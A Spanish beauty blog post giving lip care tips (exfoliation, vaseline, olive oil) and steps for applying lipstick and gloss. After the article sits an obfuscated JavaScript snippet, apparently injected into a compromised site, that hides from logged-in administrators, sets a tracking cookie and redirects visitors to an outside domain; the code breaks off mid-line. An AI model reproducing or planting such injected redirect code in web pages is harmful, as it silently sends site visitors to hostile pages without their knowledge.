Sabemos cuidar nuestra piel, pero muchas veces nos olvidamos de la importancia de cuidar nuestros labios para lucirlos bonitos y sin imperfecciones. Os voy a dar unos pasos para que luzcan bonitos, luminosos y con volumen:

1. Exfolia tus labios antes de irte a dormir. Coge un cepillo d dientes viejo o que ya no uses, lávalo bien y dedica unos minutos todas las noches a frotar tus labios con el cepillo. Conseguirás eliminar las células muertas y los pequeños pellejos.

2. Aplica un bálsamo hidratante o vaselina pura. Con los dedos deposita una generosa cantidad de vaselina en tus labios. Extiende el producto, realizando suaves movimientos por tus labios hasta que se absorba el producto y déjalo secar.

3. Si tienes los labios muy secos, aplica productos humectantes para hidratarlos y, como remedios caseros, aplica con el dedo un poco de aceite de oliva y deja que el producto penetre en tus labios. ¡Un lujo natural en tu boca!

¿CÓMO MAQUILLAR TUS LABIOS CORRECTAMENTE? Lo primero que debes hacer es elegir el tono que más te favorece. A continuación, enmarca tus labios con un lápiz delineador del mismo color que el tono que has seleccionado. Delinea ligeramente el contorno de tu boca y seguidamente añade el color de labios seleccionado (mejor aplica el producto con un pincel específico). Después, coge un labial más claro y en la parte del centro aplica ligeramente el color. ¡Verás cómo aportas más volumen a tu mirada! Como toque final, utiliza un gloss brillante para para dar una dosis de brillo y frescor a tu boca y lucir un aspecto sensual. Mima tus labios y maquíllalos de forma correcta para obtener la boca de tus sueños. ¡Es posible! Los labios son una potente arma de seducción, así que, ¡cuídalos y maquíllalos como se merecen!

 

  var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone